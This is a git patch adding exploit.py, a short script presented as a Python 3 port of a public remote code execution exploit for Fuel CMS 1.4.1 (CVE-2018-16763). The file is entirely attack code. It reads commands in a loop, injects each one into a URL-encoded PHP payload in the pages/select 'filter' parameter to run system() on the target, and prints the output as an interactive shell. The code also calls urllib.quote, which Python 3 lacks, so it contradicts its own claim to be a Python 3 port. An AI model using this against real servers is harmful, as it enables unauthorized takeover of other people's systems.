From 43da7331c617079358e24eef8d6fa7af858e474f Mon Sep 17 00:00:00 2001
From: "n3m1.sys" <mromera99@gmail.com>
Date: Sat, 10 Oct 2020 22:24:00 +0200
Subject: [PATCH] first commit

---
 exploit.py | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 exploit.py

diff --git a/exploit.py b/exploit.py
new file mode 100644
index 0000000..d54610d
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,28 @@
+#!/bin/env python3
+#
+# fuelCMS 1.4.1 - Remote Code Execution 
+#
+# Port Author: n3m1.sys
+# Original exploit by 0xd0ff9: https://www.exploit-db.com/exploits/47138
+# 
+# This is a port to Python 3 of the original exploit, as Python 2 is now deprecated.
+#
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+import requests
+import urllib
+
+url = "http://x.x.x.x:port" # Change this to the target URL
+
+while 1:
+    command = input("$: ")
+    exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27"
+    proxy = {"http" : "http://127.0.0.1:8080"} # List of the proxies you are behind
+    r = requests.get(exploit_url, proxies=proxy)
+
+    print(r.text[r.text.find("system")+6:r.text.find("<div ")])